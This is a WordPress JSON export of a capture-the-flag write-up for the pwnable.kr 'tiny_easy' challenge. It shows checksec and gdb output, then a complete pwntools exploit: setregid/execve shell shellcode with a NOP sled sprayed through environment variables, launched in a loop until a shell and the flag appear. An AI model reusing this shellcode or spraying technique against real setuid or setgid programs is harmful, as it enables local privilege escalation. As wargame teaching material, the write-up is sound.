{"id":3277,"date":"2025-04-10T19:09:54","date_gmt":"2025-04-10T10:09:54","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3277"},"modified":"2025-04-10T19:10:06","modified_gmt":"2025-04-10T10:10:06","slug":"tiny_easy","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3277","title":{"rendered":"tiny_easy"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">I made a pretty difficult pwn task.\nHowever I also made a dumb rookie mistake and made it too easy :(\nThis is based on real event :) enjoy.\n\nssh tiny_easy@pwnable.kr -p2222 (pw:guest)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">checksec<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">tiny_easy@ubuntu:~$ checksec .\/tiny_easy\n[*] '\/home\/tiny_easy\/tiny_easy'\n    Arch:       i386-32-little\n    RELRO:      No RELRO\n    Stack:      No canary found\n    NX:         NX disabled\n    PIE:        No PIE (0x8048000)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Decompiled src<\/h1>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"329\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4-1024x329.png\" alt=\"\" class=\"wp-image-3278\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4-1024x329.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4-300x96.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4-768x247.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4.png 1426w\" sizes=\"auto, (max-width: 
1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">Analysis<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0x1       \n$ebx   : 0x0       \n$ecx   : 0x0       \n$edx   : 0x6d6f682f (\"\/hom\"?)\n$esp   : 0xffffd6b4  \u2192  0x0804805a  \u2192   add BYTE PTR [eax], al\n$ebp   : 0x0       \n$esi   : 0x0       \n$edi   : 0x0       \n$eip   : 0x6d6f682f (\"\/hom\"?)\n$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x00 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0xffffd6b4\u2502+0x0000: 0x0804805a  \u2192   add BYTE PTR [eax], al\t \u2190 $esp\n0xffffd6b8\u2502+0x0004: 0x00000000\n0xffffd6bc\u2502+0x0008: 0xffffd81d  \u2192  \"SHELL=\/bin\/bash\"\n0xffffd6c0\u2502+0x000c: 0xffffd82d  \u2192  
\"HOSTNAME=2d0f4d9a440c\"\n0xffffd6c4\u2502+0x0010: 0xffffd843  \u2192  \"PWD=\/home\/ubuntu\/pwnable.kr\/tiny_easy\"\n0xffffd6c8\u2502+0x0014: 0xffffd869  \u2192  \"LOGNAME=ubuntu\"\n0xffffd6cc\u2502+0x0018: 0xffffd878  \u2192  \"_=\/usr\/bin\/gdb\"\n0xffffd6d0\u2502+0x001c: 0xffffd887  \u2192  \"LINES=66\"\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n[!] Cannot disassemble from $PC\n[!] Cannot access memory at address 0x6d6f682f\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"tiny_easy\", stopped 0x6d6f682f in ?? 
(), reason: SIGSEGV\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  \n\n<\/pre>\n\n\n\n<p>When the binary is simply run, it crashes at <code>LOAD:08048058 call edx<\/code>: the address called through <code>edx<\/code> is <code>0x6d6f682f<\/code> (the bytes <code>\/hom<\/code>, as the register dump above shows), which is not a valid executable address, so the process receives SIGSEGV.<\/p>\n\n\n\n<p>As checksec shows, every protection is disabled (no canary, NX disabled, no PIE), so shellcode placed on the stack can be executed.<\/p>\n\n\n\n<p>Therefore, the approach is to guess the address of the environment variables, place shellcode with a NOP sled there, and keep running the binary until a shell is obtained.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">solve.py<\/h1>\n\n\n\n<pre 
class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n# context.log_level = 'debug'\ncontext(arch='i386', os='linux')\nwarnings.filterwarnings( 'ignore' )\n\n# setregid(getegid(), getegid());\n# execve(\"\/bin\/\/sh\", {\"\/bin\/\/sh\", NULL}, NULL)\nshellcode = b'\\x31\\xc0\\xb0\\x32\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x31\\xc0\\xb0\\x47\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\\x80'\n\npayload = b\"\\x90\"*1000 + shellcode\n\narg = [p32(0xffab2d40)]\n\n_env = {}\nfor i in range(1000):\n    _env[str(i)] = payload\n\n# p = process(\".\/tiny_easy\")\n\nfor i in range(1000):\n    p = process(executable = \"\/home\/tiny_easy\/tiny_easy\", argv=arg, env=_env)\n    \n    try:\n        p.sendline(b\"id\")\n        p.recvline()\n    except:\n        print(f\"try: {str(i)}\")\n        continue\n\n    p.interactive()<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">tiny_easy@ubuntu:~$ mkdir -p \/tmp\/w4_tiny_easy\ntiny_easy@ubuntu:~$ cd \/tmp\/w4_tiny_easy\ntiny_easy@ubuntu:\/tmp\/w4_tiny_easy$ nano solve.py\n\ntiny_easy@ubuntu:\/tmp\/w4_tiny_easy$ python3 solve.py\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934062\ntry: 0\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934111\ntry: 1\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934137\ntry: 2\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934200\ntry: 3\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 
1934352\ntry: 4\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934381\ntry: 5\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934412\n[*] Switching to interactive mode\n$ ls\nsolve.py  tiny_easy\n$ cat \/home\/tiny_easy\/flag\nSuch_a_tiny_task:_Great_job_done_here!<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description checksec Decompiled src Analysis When the binary is simply run, it crashes at LOAD:08048058 call edx: the address called through edx is 0x6d6f682f (the bytes \/hom, as the register dump shows), which is not a valid executable address, so the process receives SIGSEGV. As checksec shows, every protection is disabled (no canary, NX disabled, no PIE), so shellcode placed on the stack can be executed. Therefore, the approach is to guess the address of the environment variables, place shellcode with a NOP sled there, and keep running the binary until a shell is obtained. 
solve.py Result<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3277","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3277"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3277\/revisions"}],"predecessor-version":[{"id":3279,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3277\/revisions\/3279"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}